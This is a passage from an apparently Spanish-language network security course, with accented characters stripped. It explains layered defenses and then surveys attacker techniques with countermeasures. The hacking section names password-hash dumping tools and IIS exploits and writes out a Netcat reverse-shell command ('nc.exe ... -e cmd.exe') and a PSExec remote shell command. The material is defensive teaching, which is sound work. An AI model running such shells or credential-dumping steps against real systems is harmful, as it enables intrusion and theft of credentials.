El acceso fsico se extiende a las consolas de administracin remotas,
adems de a los servidores. No tiene sentido proteger directamente el
acceso a los monitores y los teclados si los servicios de terminal pueden
tener acceso a los servidores desde cualquier lugar de la red interna. Esta
directriz se aplica a las soluciones de monitor de vdeo de teclado (KVM,
Keyboard Video Monitor) IP y tambin al hardware de administracin
remota.

Igualmente, es importante limitar las oportunidades que puedan facilitar


que los usuarios, con buenas intenciones o no, infecten o pongan en
peligro un sistema. Quitar los dispositivos de entrada de datos como las
unidades de disquete y de CD-ROM de los sistemas que no los requieran.
Por ltimo, compruebar que todo el hardware de red est fsicamente
protegido. Si los servidores estn protegidos en una sala o armario con
cerradura, los enrutadores y conmutadores adjuntos tambin deben estar
protegidos fsicamente. De lo contrario, un intruso puede llegar fcilmente
hasta un equipo porttil o de escritorio, y atacar a los servidores desde
dentro del permetro. Una vez ms, se debe controlar la administracin de
los dispositivos de red; de lo contrario, pueden utilizarse para perpetrar un
ataque contra el resto de la infraestructura.

9.8.

Descripcin del nivel perimetral

Cap1-15.jpg

El permetro de red es el rea de una red que est ms expuesta a un ataque


del exterior. Los permetros de red se pueden conectar a numerosos entornos
diferentes, que van desde socios comerciales a Internet. Cada organizacin usa
criterios distintos para definir su permetro. Los criterios pueden incluir algunas o
todas las conexiones descritas en la diapositiva.

9.9.

Compromiso de la seguridad del nivel de permetro

Cap1-16.jpg

La mayora de los expertos en seguridad se centran en el rea desde la


que cabe esperar que se origine un ataque, como Internet. Sin embargo,
los intrusos tambin son conscientes de que sta ser la solucin que
probablemente utilice e intentarn atacar la red desde algn otro lugar. Es
muy importante que todas las entradas y salidas de la red sean seguras.
Es improbable que uno sea el responsable de la implementacin de
seguridad de los socios comerciales; por lo tanto, no se puede confiar
completamente en todo el acceso que se origine en ese entorno. Adems,
no se tiene control del hardware de los usuarios remotos, lo que
constituye otro motivo para no confiar en el mismo. Las sucursales
podran no contener informacin confidencial y, por lo tanto, es posible
que tengan una implementacin menos segura. Sin embargo, podran
tener vnculos directos a la oficina principal que un intruso podra usar.
Es importante considerar la seguridad de la red en conjunto, no slo en
reas individuales.

9.10.

Proteccin del nivel de permetro

Cap1-17.jpg

La proteccin de los permetros se puede llevar a cabo principalmente


con servidores de seguridad. La configuracin de un servidor de
seguridad puede ser difcil desde el punto de vista tcnico. Por lo tanto,
los procedimientos deben detallar claramente los requisitos.
Los sistemas operativos recientes de Microsoft Windows facilitan el
bloqueo de los puertos de comunicacin innecesarios para reducir el perfil
de ataque de un equipo.
La traduccin de direcciones de red (NAT, Network Address Translation)
permite a una organizacin disimular las configuraciones de direcciones
IP y de puertos internos para impedir que usuarios malintencionados
ataquen los sistemas internos con informacin de red robada. Los
mecanismos de seguridad del permetro pueden ocultar tambin los
servicios internos, incluso aquellos que estn disponibles externamente,
de modo que un intruso nunca se comunique de forma directa con ningn
sistema que no sea el servidor de seguridad desde Internet.
Cuando los datos salen del entorno que est bajo la responsabilidad de
uno, es importante que se encuentren en un estado que garantice su
seguridad y que lleguen intactos a destino. Esto se puede conseguir
mediante protocolos de tnel y cifrado, con el fin de crear una red privada
virtual (VPN, Virtual Private Network).

El protocolo de tnel que emplean los sistemas de Microsoft es el


Protocolo de tnel punto a punto (PPTP, Point-to-Point Tunneling
Protocol), que utiliza Cifrado punto a punto de Microsoft (MPPE, Microsoft
Point-to-Point Encryption), o Protocolo de tnel de nivel 2 (L2TP, Layer 2
Tunneling Protocol), que utiliza el cifrado de IPSec.
Cuando los equipos remotos establecen comunicacin a travs de una
VPN, las organizaciones pueden seguir pasos adicionales para examinar
esos equipos y garantizar que cumplan una directiva de seguridad
predeterminada. Los sistemas que establecen la conexin se aslan en un
rea independiente de la red hasta que se completan las comprobaciones
de seguridad.
Los sistemas del permetro tambin deben tener usos claramente
definidos. Bloquear o deshabilitar cualquier otra funcionalidad.
Firewall de Windows, que se incluye con Windows XP y Windows Server
2003, puede extender la proteccin del permetro a los usuarios remotos.
La proteccin del permetro de una red es el aspecto ms importante para
parar un ataque del exterior. Si un permetro sigue siendo seguro, la red
interna se debe proteger contra ataques externos. Se enumeran abajo
algunas maneras de implementar la defensa del permetro:
Packet Filtering, Inspeccin de paquetes, Intrusion Detection

9.11.

Descripcin del nivel de red interna

Cap1-18.jpg

Los ataques no provienen slo de orgenes externos. Tanto si los ataques


internos son genuinos como si son meros accidentes, muchos sistemas y
servicios se daan desde dentro las organizaciones.
Es importante implementar medidas internas de seguridad orientadas a las
amenazas mal intencionadas y accidentales.

9.12.

Compromiso de la seguridad del nivel de red interna

Cap1-19.jpg

El acceso a los sistemas y recursos de red internos permite a los intrusos


obtener acceso fcilmente a los datos de la organizacin.
Mediante el acceso a la infraestructura de red tambin pueden supervisar
la red e investigar el trfico que se est transportando. Las redes
totalmente enrutadas, aunque hacen que la comunicacin sea ms fcil,
permiten a los intrusos tener acceso a los recursos de la misma red
independientemente de si se encuentran o no en ella.
Los sistemas operativos de red tienen instalados muchos servicios. Cada
servicio de red constituye un posible medio de ataque.

9.13.

Proteccin en el nivel de red interna

Uno puede tener una serie de redes en su organizacin y debe evaluar cada una
individualmente para asegurarse de que est asegurada apropiadamente. Se
enumeran abajo algunas maneras de implementar defensas de red:
VLAN Access Control Lists, Internal Firewall, Auditing, Intrusion Detection

Para proteger el entorno de la red interna, se debe requerir que cada


usuario se autentique de forma segura en un controlador de dominio y en
los recursos a los que tenga acceso. Utilizar la autenticacin mutua, de

modo que el cliente tambin conozca la identidad del servidor, con el fin
de impedir la copia accidental de datos a los sistemas de los intrusos.
Segmentar fsicamente los conmutadores, es decir, crear particiones de la
red para impedir que toda ella est disponible desde un nico punto. Se
puede crear particiones si se utilizan enrutadores y conmutadores de red
independientes o si crean varias redes virtuales de rea local (VLAN,
Virtual Local Area Network) en el mismo conmutador fsico.
Considerar cmo se van a administrar los dispositivos de red, como los
conmutadores. Por ejemplo, el grupo de trabajo de red podra utilizar
Telnet para tener acceso a un conmutador o enrutador y realizar cambios
de configuracin. Telnet pasa todas las credenciales de seguridad en
texto sin cifrar. Esto significa que los nombres y las contraseas de los
usuarios son accesibles para cualquiera que pueda rastrear el segmento
de red. Esto puede constituir una debilidad importante de la seguridad.
Considerar permitir nicamente el uso de un mtodo seguro y cifrado,
como SSH de shell o acceso de terminal serie directo.
Tambin se deben proteger adecuadamente las copias de seguridad de
las configuraciones de dispositivos de red. Las copias de seguridad
pueden revelar informacin sobre la red que resulte til a un intruso. Si se
detecta una punto dbil, se pueden utilizar copias de seguridad de la
configuracin de los dispositivos para realizar una restauracin rpida de
un dispositivo y revertir a una configuracin ms segura.
Restringir el trfico aunque est segmentado. Puede utilizar 802.1X para
proporcionar un acceso cifrado y autenticado tanto en las LAN
inalmbricas como en las estndar. Esta solucin permite utilizar cuentas
de Active Directory y contraseas o certificados digitales para la
autenticacin. Si se utilizan certificados, se tendr que integrar una
infraestructura de clave pblica (PKI, Public Key Infrastructure), en
Servicios de Windows Certificate Server; para las contraseas o
certificados, tambin necesitar un servidor RADIUS integrado en el
Servicio de autenticacin Internet (IAS, Internet Authentication Service) de
Windows. En Windows Server 2003 se incluyen IAS y Servicios de
Certificate Server.
Implementar tecnologas de cifrado y firma, por ejemplo la firma de IPSec
o bloque de mensajes de servidor (SMB, Server Message Block), con el
fin de impedir a los intrusos rastrear los paquetes de la red y reutilizarlos.

9.14.

Descripcin del nivel de host

Cap1-20.jpg

Es probable que los sistemas de una red cumplan funciones especficas. Esto
afectar a la seguridad que se les aplique.

9.15.

Compromiso de la seguridad del nivel de host

Cap1-21.jpg

Se puede atacar a los hosts de red con funciones que se sabe que estn
disponibles de forma predeterminada, aunque el servidor no las necesita
para realizar su funcin.
Los intrusos tambin podran distribuir virus para emprender un ataque
automatizado.
El software instalado en sistemas de equipos podra tener puntos dbiles
que los intrusos pueden aprovechar. Es importante permanecer informado
de todos los problemas de seguridad del software de su entorno.

9.16.

Proteccin en el nivel de host

Se debe evaluar cada host en su ambiente y crear las polticas que limitan cada
servidor solamente a esas tareas que se tienen que realizar. Esto crea otra
barrera de seguridad que un atacante necesitara evitar antes de hacer cualquier
dao.
Server Hardening, Host Intrusion Detection, IPSec Filtering, Auditing

Tanto en los sistemas cliente como en los servidores, las tcnicas de


refuerzo dependern de la funcin del equipo. En cada caso, se pueden
utilizar plantillas de seguridad y plantillas administrativas con directivas de
grupo para proteger estos sistemas.
En los sistemas cliente, tambin se pueden utilizar directivas de grupo
para restringir los privilegios de los usuarios y controlar la instalacin de
software. El uso de directivas de grupo para limitar las aplicaciones que
un usuario puede ejecutar impide que ste ejecute de forma inadvertida
cdigo de tipo Caballo de Troya.
En los sistemas de servidor, las tcnicas de refuerzo tambin incluyen la
aplicacin de permisos NTFS, la configuracin de directivas de auditora,
el filtrado de puertos y la realizacin de tareas adicionales segn la
funcin del servidor.
Mantener el servidor y el cliente actualizados con respecto a las
actualizaciones tambin mejora la seguridad. Microsoft proporciona varias
formas de aplicar revisiones a los sistemas, por ejemplo, mediante
Windows Update, Software Update Service y Microsoft Systems
Management Server (SMS).
La utilizacin de un paquete antivirus actual y de un servidor de seguridad
personal, como Firewall de Windows, disponible con Windows XP y con
los sistemas operativos posteriores, puede reducir mucho la parte
expuesta a un ataque de un equipo cliente.

9.17.

Descripcin del nivel de aplicacin

Cap1-22.jpg

Las aplicaciones de red permiten que los clientes tengan acceso a los
datos y los traten. Tambin constituyen un punto de acceso al servidor
donde se ejecutan las mismas.
Recordar que la aplicacin proporciona un servicio a la red. Este servicio
no debe anularse con la implementacin de seguridad.
Examinar las aplicaciones desarrolladas internamente, adems de las
comerciales, en busca de problemas de seguridad.

9.18.

Compromiso de la seguridad del nivel de aplicacin

Cap1-23.jpg

Los intrusos cuyo inters son las aplicaciones pueden bloquear alguna
para conseguir que su funcionalidad deje de estar disponible.
Las aplicaciones pueden tener defectos que los atacantes pueden
manipular para ejecutar cdigo malintencionado en el sistema.
Un intruso podra utilizar en exceso un servicio de modo que se
imposibilite su uso legtimo; ste es un tipo de ataque de denegacin de
servicio.
Una aplicacin tambin podra utilizarse para llevar a cabo tareas para las
que no est destinada, como enrutar correo electrnico.

9.19.

Proteccin en el nivel de aplicacin

Como otra capa de defensa, Application Hardening es una parte esencial de


cualquier modelo de seguridad. Cada aplicativo en una organizacin debe ser
probado a fondo para la conformidad de seguridad en un ambiente de prueba
antes de que se permita su puesta en produccin.
Validation Checks, Verify HTML / Cookies Source, Secure IIS

Las instalaciones de las aplicaciones slo deberan incluir los servicios y


funcionalidad requeridos.
Las aplicaciones desarrolladas internamente se deben evaluar para
descubrir vulnerabilidades en la seguridad de una forma continuada y

deben desarrollarse e implementarse revisiones para cualquier


vulnerabilidad que se identifique.
Las aplicaciones que se ejecutan en la red se deben instalar de forma
segura y se les deben aplicar todas las revisiones y Service Packs
correspondientes.
Debe ejecutarse software antivirus para ayudar a impedir la ejecucin de
cdigo malintencionado.
Si una aplicacin se ve comprometida, es posible que el intruso pueda
tener acceso al sistema con los mismos privilegios con los que se ejecuta
la aplicacin. Por lo tanto, ejecutar los servicios y aplicaciones con el
menor privilegio necesario.
Al desarrollar nuevas aplicaciones personalizadas, implementar las
recomendaciones ms recientes de ingeniera de seguridad.

9.20.

Descripcin del nivel de datos

Cap1-24.jpg

El nivel final lo constituyen los datos. Los sistemas de equipos


almacenan, procesan y ofrecen datos. Cuando los datos se procesan en
un formato con significado, se convierten en informacin til.

Los datos sin formato y la informacin que se almacena en un sistema


son objetivos de un posible ataque. El sistema mantiene los datos en
medios de almacenamiento masivo, generalmente en un disco duro.
Todas las versiones recientes de Microsoft Windows admiten varios
sistemas de archivos para almacenar y tener acceso a los archivos en un
disco. Uno de estos sistemas, NTFS, se puede utilizar en Microsoft
Windows NT, Windows 2000, Windows XP y Microsoft Windows
Server 2003. Proporciona tanto permisos de archivo como de carpeta
para ayudar a proteger los datos.
NTFS admite caractersticas adicionales, como la auditora y el Sistema
de archivos de cifrado (EFS, Encrypting File System), que se utiliza para
implementar la seguridad en los datos.

9.21.

Compromiso de la seguridad del nivel de datos

Cap1-25.jpg

Los intrusos que obtienen acceso a un sistema de archivos pueden hacer


un dao enorme u obtener gran cantidad de informacin. Pueden ver
archivos de datos y documentos, algunos de los cuales tal vez contengan

informacin confidencial. Tambin pueden cambiar o quitar la


informacin, lo que puede ocasionar varios problemas a una
organizacin.
El servicio de directorio Active Directory utiliza los archivos del disco para
almacenar la informacin del directorio. Estos archivos se almacenan en
una ubicacin predeterminada cuando el sistema se promueve a
controlador de dominio. Como parte del proceso de promocin, sera
aconsejable almacenar los archivos en algn lugar diferente de la
ubicacin predeterminada porque de este modo quedaran ocultos de los
intrusos. Dado que los nombres de los archivos son conocidos (tienen el
nombre de archivo NTDS.dit), si nicamente se reubican es probable que
slo se consiga entorpecer el trabajo del intruso. Si los archivos de
directorio se ven comprometidos, todo el entorno del dominio queda
expuesto al riesgo.
Los archivos de aplicacin tambin se almacenan en disco y estn
expuestos a un ataque, con lo que se ofrece a los intrusos la oportunidad
de interrumpir la aplicacin o manipularla con fines malintencionados.

9.22.

Proteccin en el nivel de datos

EFS permite el cifrado de los archivos cuando residen en el sistema de


archivos. Se basa en el formato NTFS del disco, que est disponible
desde Windows 2000. Es importante entender que EFS no cifra los
archivos mientras se estn transmitiendo a travs de una red. El proceso
de cifrado utiliza una clave para cifrar el archivo y la tecnologa de claves
pblica y privada para proteger dicha clave.
NTFS tambin proporciona seguridad en los archivos y en las carpetas.
De este modo, se permite la creacin de listas de control de acceso para
definir quin ha obtenido acceso a un archivo y qu acceso tiene.
El aumento de la proteccin del nivel de datos debe incluir una
combinacin de listas de control de acceso y cifrado. Al cifrar un archivo,
nicamente se impide la lectura no autorizada; no se evita ninguna accin
que no requiera la lectura del archivo, como la eliminacin. Para impedir
la eliminacin, utilice listas de control de acceso.
Puesto que los datos son esenciales en muchos negocios, es importante
que su recuperacin sea un proceso conocido y probado. Si se realizan
copias de seguridad con regularidad, cualquier alteracin o eliminacin de
datos, ya sea accidental o malintencionada, puede recuperarse a partir de
las copias de seguridad cuando corresponda. Un proceso confiable de
copia de seguridad y restauracin es vital en cualquier entorno. Adems,
se deben proteger las cintas de copia de seguridad y restauracin. Las
copias de las cintas de copia de seguridad y restauracin se debe
mantener en otro lugar, en una ubicacin segura. El acceso no autorizado

10.

a las cintas de copia de seguridad es igual de daino que infringir la


seguridad fsica de la infraestructura.
Las listas de control de acceso slo funcionan en documentos dentro del
sistema de archivos para el que se hayan habilitado. Una vez que se han
copiado los documentos a otra ubicacin (por ejemplo, a la unidad de
disco duro local de un usuario), no se sigue controlando el acceso.
Windows Rights Management Services (RMS), que se incluye con
Windows Server 2003, mueve la funcin de control de acceso al propio
objeto de forma que dicho control se aplica independientemente de dnde
se almacene el documento fsico. RMS tambin ofrece a los creadores de
contenido un mayor control sobre las acciones particulares que un usuario
tiene permitido llevar a cabo; por ejemplo, el destinatario puede tener
concedido acceso para leer un documento, pero no para imprimir o copiar
y pegar; en el correo electrnico enviado con Microsoft Office Outlook
2003, el remitente del mensaje puede impedir que los destinatarios
reenven el mensaje.

Respuesta a incidentes de seguridad

En este tema, se explicar cmo responder a incidentes de seguridad.


Especficamente, se tratar:
El uso de una lista de comprobacin de respuesta a incidentes.
La contencin de los efectos de un ataque.
10.1.

Determinacin de Riesgos de Seguridad

Cap1-32.jpg
Para determinar riesgos de seguridad, puede ayudar el preguntarse "cul sera
el dao al negocio si" Intente pensar en qu se pueden comprometer su red y
cmo afectar el negocio. stos pueden incluir aplicativos de lnea de negocio,
datos del cliente, etctera.
Una vez que se haya formulado una lista, identificar qu puede daar su negocio
ms, si est comprometido. Los daos posibles pueden incluir:

Tiempo muerto
Prdida de negocio
Reputacin daada
Confianza del cliente
Uso fraudulento de la informacin
Responsabilidad Legal

Despus que usted ha determinado los posibles riesgos, pregntese "qu


puedo yo hacer para atenuar el riesgo?"
Para ms informacin, ir a Microsoft Press book Windows Security Resource Kit
as como en Microsoft Solution for Securing Windows 2000
http://go.microsoft.com/fwlink/?LinkId=14837

10.2.

Tecnicas de Hacking

Cap1-33.jpg

Footprinting
Scanning
Enumeration
Gaining Access
Privilege Escalation
Buffer Overflows
Shovel a Shell
Interactive Control
Camouflaging
Intelligence Gathering
Island Hopping

Denial of Service
Social Engineering

Luego, mirar algunas tcnicas comunes de hacking. Cuanto ms se aprende


sobre las tcnicas usadas por el hacker, mejor se puede proteger una red contra
estas tcnicas.
Nota: Esto no es un manual de cmo atacar sistemas pero es en algo una
descripcin de las tcnicas usadas por los atacantes.
10.2.1.

Tecnicas de Hacking: Footprinting

El uso de un atacante de herramientas y de la informacin para crear un perfil


completo de la postura de la seguridad de una organizacin se conoce como
footprinting. Por ejemplo, antes de que un hacker ataque una red, el/ella quiere
conocer la informacin que incluye:

Presencia en Internet/ extranet de la compaa


La poltica de la compaa con respecto al acceso remoto
La versin utilizada de software en los servers (IIS, Exchange etc)
Los rangos IP de los cuales es propietaria la organizacion
Desafos tcnicos hechos por la compaa
Las fusiones o las adquisiciones que terminaron recientemente, estan en
marcha o pendientes

Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la
informacin sobre una compaa. Puede ser tan simple como usar un Search
Engine para encontrar la informacin tal como la que fija el detalle tcnico de un
administrador, usar al USENET o detalles incluidos en publicidad de una
compaa.
Ms informacin un atacante tiene antes de comenzar su ataque y por lo tanto
ms fcil ser para que apunten una debilidad especfica en la infraestructura.
10.2.2.

Tcnicas de Hacking: Scanning

Como resultado del footprinting, un hacker puede identificar la lista de red y las
direcciones IP utilizadas en la compaa. El siguiente paso lgico para un hacker
es el scanning. El uso de un atacante de herramientas y de la informacin es
para determinar qu sistemas estas vivos y accesibles desde Internet as como
qu puertos estn escuchando en cualquier sistema dado. Con ese
conocimiento, el atacante puede apuntar los sistemas especficos que funcionan
con software o servicios especficos usando exploit conocidos.
10.2.3.

Tcnicas de Hacking: Enumeration

Enumeration implica el uso de un atacante de herramientas para obtener la


informacin detallada sobre un sistema remoto - por ejemplo servicios
ejecutndose, todos los shares, cuentas de usuario, grupos, miembros de un
dominio, politicas de cuentas (lockout, password age, etc.
Un hacker tpicamente utiliza enumeration no intrusiva probando si la
informacin que obtuvo es suficiente para un ataque.
Nota:
RestrictAnonymous = 1 es derrotado fcilmente por las ultimas
herramientas de enumeracin (NBTEnum2.1.exe, DumpSec)
RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar
sistemas crticos para asegurarse de que los cambios de la seguridad no
afectarn sistemas de produccin de una manera negativa.
Renonbrar las cuentas administrativas es un buen punto para no utilizar
RestrictAnonymous configurado con valor =2 o bloquear el acceso a
puertos. NetBIOS una variedad de herramientas tienen la habilidad de
poder determinar cuentas administrativas basadas en SID / RID
enumerados va queries NetBIOS.
Propsito:
Usar la informacin detallada acerca del sistema remoto, servicios, shares,
cuentas de usuarios, grupos, informacin de controladores de dominio, polticas
de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de
atacar la seguridad de cuentas y servicios en el objetivo.

10.2.4.

Tcnicas de Hacking: Port Redirection

Cuando se tiene configurado un firewall para bloquear determinados puertos de


acceso entrante, un hacker puede usar port redirection como camino de acceso
a la red. Port redirection es utilizado para escuchar en algunos puertos. Los
paquetes son redireccionados a destinos especficos.
Nota:
El Port Redirector tiene que instalarse en un servidor detrs de un firewall.
Usar algn otro exploit (IIS buffer overflow, etc.). El resto de las pautas de
seguridad atenuarn a menudo el riesgo de este tipo de ataque.
Utilizar una poltica IPSec para permitir el acceso a los puertos abiertos
de las mquinas especficas.
El filtrado de ingreso parece ser usualmente la parte importante, pero el
filtrado de egreso es importante tambin!
En otras palabras si un IIS Server solamente necesita hablar con un solo
COM+ server en una DMZ en un puado de puertos, configurar una

politica IPSec para hacer cumplir esta poltica, no permitir al server IIS
para comunicarse con cualquier servidor en la red en cualquier puerto,
filtro es trfico de salida tambin!
Tambin, estar enterado del tipo de excedente de trfico en cualquier puerto
dado. Si se ve el trfico ICMP que debe tener una carga til cero del octeto o
contener una carga til 500k o de trfico de TFTP en el puerto 80, eso debe
alertar, ms an si no es parte de sus operaciones estndares.
Propsito:
Despus que el atacante tiene identificado y accede al trafico del firewall que
puede permitir trfico de entrada de un puerto origen 53, procurar instalar un
software Port Redirector en el equipo dentro del firewall. El Port Redirector
tomar el trfico entrante destinado para un puerto (53) y lo enviar a otro
equipo detrs del firewall en otro puerto (3389).
Ejemplo:
FPipe.exe herramienta port redirection de linea de commandos
Contramedidas:
El Port Redirector tiene que instalarse de alguna manera en un servidor detrs
del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guas de
seguridad atenuarn el riesgo de este tipo de ataque.
Usar una poltica de IPSec para permitir solamente el acceso a los puertos
abiertos de las mquinas especficas.

10.2.5.

Tcnicas de Hacking: Gaining Access

Hay varias herramientas disponibles que pueden permitir a un hacker tomar


control de un sistema. Por ejemplo, Samdump y Brutus son crackers de
passwords. Samdump se utiliza extraer el hashes del password de los archivos
SAM. Brutus es un cracker de password remoto. Si un hacker consigue el
acceso a una copia de una base de datos SAM, el hacker podra utilizar
l0phtcrack y extraer los usuarios y passwords exactos.
ATACAR LA SAM MIENTRAS QUE EST EN LNEA
Propsito:
Los atacantes consiguen los password hashes de la SAM en un sistema en lnea
para comprometer cuentas adicionales.
Utilizan las herramientas por ejemplo PWdump2 que utiliza una tcnica conocida
como DLL injection para inyectar cdigo malicioso en LSASS.EXE (a trusted

process). LSASS puede solicitar password hashes desencriptados para saltear


la proteccin de SYSKEY.
Ejemplos:
Samdump
Pwdump1,2,3,3e
LC3 / LC4
Contramedidas:
SYSKEY est habilitado por defecto en Windows 2000 en modo 0 y encripta con
hashes de 128bit. La key para desencriptar se guarda en registry.
Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden
sortear todas las protecciones de SYSKEY en todos los modos para extraer los
passwords.
Evitar que un atacante descargue hashes es la mejor contramedida pero para el
aseguramiento agregado hacer el siguiente:

Desabilitar la posibilidad de guardar los LM hashed password en registry


(habilitado por defecto).
Cambiar todos los passwords luego de hacer esto!
Requerir password complejas (recomendado 15 caracteres alfanumricos
ej. !@#$%^&*-)

ATACAR UNA COPIA FUERA DE LNEA DE LA SAM


Propsito:
Existen numerosos exploits de IIS para obtener una copia de la SAM.
El acceso fsico incorrecto puede conceder el acceso a la SAM
Ej. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de
bloquear la consola.
Esto permite obtener una copia de la SAM con el fin el conseguir hashes!
Ejemplo
CHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot
floppy est disponible y puede obtener una copia de la SAM, SYSTEM y
SECURITY en una RAM drive para directamente ver y editar con CHNTPW.
Si la proteccin SYSKEY est habilitada (esto es por defecto en la SAM de
Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la
SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el
cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego
puede iniciar sesin y obtener el resto de las password (usando PWDump3 etc.).
Contramedidas
No permitir la copia de la SAM.
Deshabilitar el almacenamiento de LM hashed password en la SAM.

Habilitar SYSKEY en modo 2 o 3 para requerir una password un floppy


que contenga la key privada antes de poder iniciar sesion.
Si un atacante puede inhabilitar SYSKEY y escribir una nueva password
para el administrador en la SAM, todos los password hashes del resto de
las cuentas continuan encriptados y protegidos del ataque.

Notas: Para deshabilitar el almacenamiento de LM hash en la SAM refirase a


la siguiente KB: Q299656 New Registry Key to Remove LM Hashes from AD &
SAM http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q299656
SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM
para prevenir cracking fuera de lnea (Q143475 Windows NT System Key
Permits Strong Encryption of the SAM)
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475)
No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.
10.2.6.

Tcnicas de Hacking: Privilege Escalation

Un hacker puede causar la mayora del dao consiguiendo privilegios


administrativos en una red. Hay varias utilidades que un hacker puede utilizar
para ganar privilegio administrativo. Por ejemplo, la utilidad Getadmin.exe es
usada para otorgar a usuarios comunes privilegios administrativos agregando a
estos usuarios al grupo de administradores. Esta utilidad funciona con todas las
cuentas excepto con la cuenta de Guest.
Es importante observar que cualquier cuenta se haya concedido el Debug
Programs right. Siempre se podr ejecutar satisfactoriamente Getadmin.exe,
incluso despus de la aplicacin del hotfix. Esto es porque el Debug Programs
right habilita al usuario a adjuntar cualquier proceso. El Debug Programs right
es inicialmente otorgado a Administradores y debe ser utilizado nicamente con
usuarios altamente confiables.
Tambin, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del
grupo local de los administradores, continua funcionando (incluso luego de
aplicar el hotfix).
Nota: Para mas informacin dirigirse a:
http://support.microsoft.com/default.aspx?scid=kb;en-us;146965

10.2.7.

Tenicas de Hacking: Buffer Overflows

Algunas herramientas de ataque ejecutan cdigo de buffer overruns.


Sobreescribiendo segmentos especficos de la memoria, el atacante puede
volver a dirigir una llamada de la memoria dentro de un programa para llamar su
propio cdigo en vez del cdigo previsto. Tal llamada funcionara en el contexto
de seguridad del proceso que lo llama ms que el nivel de privilegio del usuario.
Propsito:
Las herramientas BO overflow un-checked buffers generan cdigo en
aplicaciones de Server para causar shellcode y ejecutarse (usualmente en
contexto SYSTEM o IWAM si explota IIS / SQL etc.)
Ejemplos:
JILL-WIN32.EXE
Explota IIS .printer overflow
IIS5hack.exe
ISPC.EXE
Exploits IIS .idq overflow
Unicodeloader.pl
HTTPODBC.DLL
SQL buffer overflows
Contramedidas:
Mantener al dia los hotfixes
Deshabilitar servicios innecesarios
Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)
Emplear un sistema IDS actualizado para denegar pedidos sospechosos /
conocidos como attack signaturas.

10.2.8.

Tcnicas de Hacking: Shovel a Shell

Propsito:
Herramientas de shell Remoto habilitan a los atacantes a acceder al remote
command shell en el servidor destino. Los atacantes usan remote shell para
elevar sus privilegios.
Ejemplos:
Netcat
Nc.exe prove una conexion raw a servidores remotos via TCP.
Puede funcionar como un servidor o un cliente
Cryptcat, es igual que Netcat pero encripta los datos via un canal TCP
Nc.exe 10.1.1.10 5000 e cmd.exe
shovel a shell de un servidor comprometido de nuevo a una mquina remota
cliente que funciona escuchando en la direccin 10.1.1.10 en el puerto 5000
PSExec.exe \\192.168.1.1 cmd.exe
Requiere acceso administrativo

Requiere acceso a NetBIOS (TCP 139)


Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota
CMD.EXE y conecta con la command shell del cliente.
Contramedidas:
Netcat (nc.exe) puede establecer una conexin TCP al servidor destino en
cualquier Puerto que est escuchando y no sea utilizado. Es por eso que un
filtrado apropiado en el firewall previene este tipo de ataque.
Politicas IPSec para habilitar trafico entrante nicamente a los Puertos donde
corren servicios es un mtodo eficaz (slo habilitar trafico en el puerto 80 en
servidores IIS, denegar todo el trafico en otros puertos)

10.2.9.

Tcnicas de Hacking: Interactive Control

Propsito:
Llamados como RATs (Remote Administration Tools).
stas son herramientas reales y cautelosas de Administracion Remota
contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe).
Eso permite que un usuario remoto realice cualquier accin remotamente va un
puerto a su elecion sin un usuario local del sistema que lo habilite!
Caractersticas populares: Keystroke logging, dedicados a grabar password de
servicios populares (AIM, ICQ, File shares etc.), tienen la habilidad de crear file
shares, transferir files, remote desktop, remote execution, reboot system, etc.
Ejemplos:
Sub7, BO2k, NetBus, NT Rootkit
Sub7 es el ms popular / NT Rootkit es el ms avanzado
Contramedidas:
Puesto que la mayora de los Trojanos escucha en un puerto para habilitar el
acceso remoto del atacante, un filtrado apropiado de puertos sera lo indicado
para prevenir este ataque.
La mayora de los productos anti-virus detectarn a stos y sus variantes pero
hay literalmente millares de variantes nuevas que aparecen a cada hora
Usualmente llegan como archivos adjuntos va e-mail; por eso no habilitar e-mail
/ internet browsing en servers y controlar los adjuntos a travs de
Outlook/Exchange Email Security functionality, Software Restriction Policies,
Filtros en los SMTP gateway o mail server etc.
La mayora de los Trojanos intentan modificar Run / RunOnce y otras
configuraciones de typo auto-run. Puede utilizarse software de monitoreo como
NetIQ que puede avisar por medio de alertas sobre eventos de modificacin de

estas keys de registry. Aplicando permisos de ACLs a estas keys, se puede


reducir (pero no eliminar) estos ataques.

10.2.10.

Tecnicas de Hacking: Camouflaging

Despus que un hacker logra la entrada en una red, tratar de no dejar rastros
de su presencia y su paso a los Administradores. Hay varias herramientas que
un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas
para borrar registros de los logs de eventos.
NT Rootkits es utilizado a veces por un atacante. En tal ataque, son
reemplazados ciertos archivos con versiones modificadas. Cuando un
administrador utiliza el ejecutable, el atacante obtiene informacin adicional para
continuar su ataque. Semejantemente, los elementos especficos de salida se
pueden enmascarar por rootkit para camuflar las herramientas de ataque que se
ejecutan en el sistema. Un acercamiento comn para detectar archivos
modificados es comparar la versin en el hash de un archivo limpio. Es
importante observar que la comparacin se debe hacer en una mquina limpia
usando medios confiables, pues es tambin es posible que cualquier utilidad del
ataque haya comprometido el sistema en cuestin.
Propsito:
Alertar a el atacante que alguien est investigando.
Se puede utilizar para ejecutar programas destructivos en nombre del
Administrador o instalar backdoor trojans.
Ejemplos:
Sobreescribir los comandos del sistema con comandos del trojano.
Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o
detengan procesos del atacante.
Sobreescribir CMD.EXE con una versin del atacante.
Contramedidas:
Generar las keys MD5 para todos los archivos del sistema importantes y
comprobar hashes con frecuencia.
Configurar una auditoria adecuada de archivos.
Usar permisos apropiados sobre los archivos.

10.2.11.

SNIFFING
Propsito:

Tcnicas de Hacking: Intelligence Gathering

